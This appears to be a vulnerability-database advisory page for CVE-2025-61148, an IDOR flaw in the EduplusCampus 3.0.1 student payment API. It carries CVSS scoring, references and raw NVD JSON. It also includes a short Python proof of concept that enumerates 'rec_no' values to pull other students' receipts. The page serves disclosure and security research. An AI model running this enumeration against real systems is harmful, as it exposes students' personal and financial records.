CVE-2025-61148

Description

An Insecure Direct Object Reference (IDOR) vulnerability in the EduplusCampus 3.0.1 Student Payment API allows authenticated users to access other students personal and financial records by modifying the 'rec_no' parameter in the /student/get-receipt endpoint.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:edupluscampus:edupluscampus:3.0.1:*:*:*:*:*:*:* - VULNERABLE

EduplusCampus 3.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = 'http://target.com/student/get-receipt'
headers = {'Authorization': 'Bearer <token>'}

for i in range(1, 100):
    payload = {'rec_no': i}
    resp = requests.post(target, json=payload, headers=headers)
    if resp.status_code == 200:
        print(f'Found record: {resp.json()}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61148
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61148
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61148/
[4] VulDB https://vuldb.com/cve/CVE-2025-61148
[5] https://drive.google.com/file/d/1BRZRurbl7TY6KU4uaelAUn7L9Cn6XfjC/view?usp=sharing
[6] https://github.com/sharma19d/CVE-2025-61148
[7] https://medium.com/@Charon19d/how-i-hacked-all-universities-in-my-city-d6b8e320455c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61148", "sourceIdentifier": "[email protected]", "published": "2025-12-04T16:16:22.107", "lastModified": "2025-12-16T17:51:07.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Insecure Direct Object Reference (IDOR) vulnerability in the EduplusCampus 3.0.1 Student Payment API allows authenticated users to access other students personal and financial records by modifying the 'rec_no' parameter in the /student/get-receipt endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edupluscampus:edupluscampus:3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "4AE1DFC1-5C19-4389-AEC0-25110C6E5D76"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1BRZRurbl7TY6KU4uaelAUn7L9Cn6XfjC/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/sharma19d/CVE-2025-61148", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://medium.com/@Charon19d/how-i-hacked-all-universities-in-my-city-d6b8e320455c", "source": "[email protected]", "tags": ["Product"]}]}}